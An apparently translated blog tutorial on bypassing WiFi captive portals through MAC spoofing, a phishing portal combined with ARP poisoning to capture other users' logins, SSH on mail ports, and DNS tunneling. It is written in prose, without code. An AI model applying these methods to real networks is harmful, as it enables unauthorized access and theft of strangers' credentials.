What to do if the wifi requires web authentication?

WiFi that requires authentication

This is an open WiFi network. Before actually using the network, when visiting any web page, you will usually encounter a mandatory authentication page - you can only start using the network after entering the correct username and password.

In our daily life, you can find various mandatory identity authentication pages, such as in McDonald's, hospitals, airports, parks, etc.

Hack it!

The first thing you need to note is that since it is an open WiFi network, you can connect to it effortlessly. However, this kind of WiFi will use identity authentication to restrict legitimate users from accessing the Internet. Usually this is done to prevent the network from being abused, for example, to prevent people from downloading pornographic content, using the network for illegal activities, etc.

No matter what, once we are connected, we can scan all hosts on the network and sniff their traffic.

There are mainly the following common methods to bypass hotspot authentication. We will introduce them one by one below.

1. MAC address forgery method

Open network authentication usually involves linking the MAC address of your Internet device with your Internet credentials (such as account number and password). Get up and make it happen.

However, because the MAC address of any device is easily modified, such as laptops, smartphones and other devices. So this verification method is not a robust or secure authentication method.

The first thing we need to do is scan the entire network for other clients that are already connected to the network. The fastest way to achieve this is to use ARP scanning technology, which will provide us with a complete ARP table containing the IP addresses and MAC addresses of all connected devices.

Now, we can try one by one using the MAC addresses in the picture above to see whether the corresponding client has passed authentication.

In order to improve the viewing speed, we can try the following methods:

1. Detect whether these devices can generate communication traffic.

2. If traffic is generated, intercept the traffic and check whether it is Internet traffic.

If the above two conditions are met at the same time, then we can be very sure that the client has passed the authentication of the network authentication portal.

Sometimes this type of WiFi only provides free services for a certain period of time or traffic to a user. In this case, once the service expires, we can continue to enjoy the network service by randomly modifying the MAC address.

2. Forged authentication page

This method is similar to "phishing": we create a fake authentication page to force normal users to log in to the page for authentication, and then we can Steal their Internet credentials.

As I wrote before, all traffic on an open WiFi network is unencrypted plaintext data, so we can intercept and tamper with network traffic and do whatever we want. Although sometimes the authentication pages are connected via HTTPS, they almost always use the same custom certificate.

In order to create a fake authentication portal, we had to download the original authentic authentication page. You can use any tool you like to download and then edit the portal to store user-entered credentials. Once we save this information, we should forward the user request information to the original real authentication page for authentication.

But the question is, how do we force users to log in to our fake authentication portal instead of the original one?

The simplest method is to launch an ARP poisoning attack on all clients, notifying the MAC address of the Internet device authentication portal that is now our own MAC address.

The following picture can explain this method well:

We build a Web server and then make a fake authentication page on it.

At this point the work is done, we just need to wait for the username and password.

3. Use "Forgot Password"

This method is very simple. Some WiFi hotspots with authentication will provide password reset services when you forget your password.

Usually, this service is implemented through your mobile phone number, and a new password will be sent to the mobile phone number you entered. However, there are many times when new passwords are sent via email.

If this is the case, then most likely they will allow you to connect your mail client to your IMAP/POP mail server, which means that at this time you can use their network for free to view your Mail. More generally, they usually don't check whether the traffic you generate is actually IMAP or POP traffic (mainly because the traffic is encrypted)!

So you can set up an SSH server on your VPS with port number 995 or 993. These two ports are the default port numbers for POP3 and IMAP encrypted traffic respectively. So you can create an SSH tunnel to proxy your web browsing.

4. DNS tunnel method

Most of the time, WiFi hotspots will allow you to query DNS. They generally use their own DNS servers, and many times they also allow you to query external DNS. server.

A more interesting project "Iodine" created a few years ago is a software related to DNS tunneling. Using this software, you can use the DNS protocol to create a tunnel to your server and then use it to access the Internet.

This is somewhat similar to using a VPN to connect to your office network. Once you've created that tunnel, you can set up a proxy again to connect to your server through the SSH tunnel so you have an encrypted, secure channel to the Internet.